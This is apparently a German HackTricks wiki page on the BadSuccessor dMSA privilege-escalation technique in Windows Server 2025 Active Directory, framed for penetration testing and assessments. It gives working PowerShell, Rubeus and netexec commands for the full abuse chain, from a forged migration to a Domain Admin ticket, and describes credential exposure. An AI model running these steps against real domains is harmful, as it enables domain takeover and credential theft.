BadSuccessor
Tip
Lerne & übe AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Durchsuche den vollständigen HackTricks Training-Katalog nach den Assessment-Tracks (ARTA/GRTA/AzRTA) und Linux Hacking Expert (LHE).
Support HackTricks
- Sieh dir die subscription plans an!
- Tritt der 💬 Discord group, der telegram group bei, folge @hacktricks_live auf X/Twitter, oder schau dir die LinkedIn page und den YouTube channel an.
- Teile hacking tricks, indem du PRs in die HackTricks und HackTricks Cloud github repos einreichst.
Überblick
BadSuccessor missbraucht den delegated Managed Service Account (dMSA) Migrations-Workflow, der in Windows Server 2025 eingeführt wurde. Ein dMSA kann über msDS-ManagedAccountPrecededByLink mit einem Legacy-Account verknüpft und durch die Migrationszustände verschoben werden, die in msDS-DelegatedMSAState gespeichert sind. Wenn ein Angreifer einen dMSA in einer beschreibbaren OU erstellen und diese Attribute kontrollieren kann, kann der KDC Tickets für den vom Angreifer kontrollierten dMSA mit dem authorization context des verknüpften Accounts ausstellen.
In der Praxis bedeutet das: Ein Low-Privileged-User, der nur delegierte OU-Rechte hat, kann einen neuen dMSA erstellen, ihn auf Administrator zeigen lassen, den Migrationszustand abschließen und dann ein TGT erhalten, dessen PAC privilegierte Gruppen wie Domain Admins enthält.
dMSA migration details that matter
- dMSA ist ein Windows Server 2025-Feature.
Start-ADServiceAccountMigrationsetzt die Migration in den started-Zustand.Complete-ADServiceAccountMigrationsetzt die Migration in den completed-Zustand.msDS-DelegatedMSAState = 1bedeutet, Migration gestartet.msDS-DelegatedMSAState = 2bedeutet, Migration abgeschlossen.- Während einer legitimen Migration soll der dMSA den ersetzten Account transparent ersetzen, sodass KDC/LSA den Zugriff beibehalten, den der vorherige Account bereits hatte.
Microsoft Learn weist außerdem darauf hin, dass während der Migration der ursprüngliche Account an den dMSA gebunden ist und der dMSA auf das zugreifen soll, worauf der alte Account zugreifen konnte. Genau diese Sicherheitsannahme missbraucht BadSuccessor.
Anforderungen
- Eine Domain, in der dMSA existiert, was bedeutet, dass auf der AD-Seite Windows Server 2025-Support vorhanden ist.
- Der Angreifer kann
msDS-DelegatedManagedServiceAccount-Objekte in einer OU erstellen oder hat dort gleichwertige weitreichende Child-Object-Creation-Rechte. - Der Angreifer kann die relevanten dMSA-Attribute schreiben oder den gerade erstellten dMSA vollständig kontrollieren.
- Der Angreifer kann Kerberos-Tickets aus einem domain-joined Kontext oder über einen Tunnel anfordern, der LDAP/Kerberos erreicht.
Praktische Prüfungen
Das sauberste Operator-Signal ist zu verifizieren, ob Domain-/Forest-Level passen und zu bestätigen, dass die Umgebung bereits den neuen Server-2025-Stack verwendet:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Wenn du Werte wie Windows2025Domain und Windows2025Forest siehst, behandle BadSuccessor / dMSA migration abuse als Prioritätsprüfung.
Du kannst auch schreibbare OUs enumerieren, die für dMSA-Erstellung delegiert wurden, mit öffentlichen Tools:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Missbrauchsablauf
- Erstelle eine dMSA in einer OU, in der du delegierte create-child-Rechte hast.
- Setze
msDS-ManagedAccountPrecededByLinkauf den DN eines privilegierten Ziels wieCN=Administrator,CN=Users,DC=corp,DC=local. - Setze
msDS-DelegatedMSAStateauf2, um die Migration als abgeschlossen zu markieren. - Fordere ein TGT für die neue dMSA an und verwende das zurückgegebene Ticket, um auf privilegierte Dienste zuzugreifen.
PowerShell-Beispiel:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Ticket-Anfrage / Beispiele für Operational Tooling:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Warum das mehr als Privilege Escalation ist
Während einer legitimen Migration muss Windows auch das neue dMSA verwenden, um Tickets zu verarbeiten, die vor dem Cutover für das vorherige Konto ausgestellt wurden. Deshalb kann dMSA-bezogenes Ticket-Material im KERB-DMSA-KEY-PACKAGE-Flow aktuelle und vorherige Keys enthalten.
Bei einer vom Angreifer kontrollierten Fake-Migration kann dieses Verhalten BadSuccessor in Folgendes verwandeln:
- Privilege escalation durch Vererbung privilegierter Gruppen-SIDs im PAC.
- Credential material exposure weil die Behandlung des vorherigen Keys in anfälligen Workflows Material offenlegen kann, das dem RC4/NT hash des Vorgängers entspricht.
Damit ist die Technik sowohl für direkte Domain-Takeover als auch für Folgeoperationen wie pass-the-hash oder breitere Credential-Kompromittierung nützlich.
Hinweise zum Patch-Status
Das ursprüngliche BadSuccessor-Verhalten ist nicht nur ein theoretisches Preview-Problem von 2025. Microsoft hat CVE-2025-53779 zugewiesen und im August 2025 ein Security Update veröffentlicht. Halte diesen Angriff dokumentiert für:
- labs / CTFs / assume-breach exercises
- unpatched Windows Server 2025 environments
- Validierung von OU-Delegations und dMSA-Exposition während Assessments
Gehe nicht davon aus, dass eine Windows Server 2025-Domain verwundbar ist, nur weil dMSA existiert; prüfe den Patch-Stand und teste sorgfältig.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Lerne & übe AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Durchsuche den vollständigen HackTricks Training-Katalog nach den Assessment-Tracks (ARTA/GRTA/AzRTA) und Linux Hacking Expert (LHE).
Support HackTricks
- Sieh dir die subscription plans an!
- Tritt der 💬 Discord group, der telegram group bei, folge @hacktricks_live auf X/Twitter, oder schau dir die LinkedIn page und den YouTube channel an.
- Teile hacking tricks, indem du PRs in die HackTricks und HackTricks Cloud github repos einreichst.


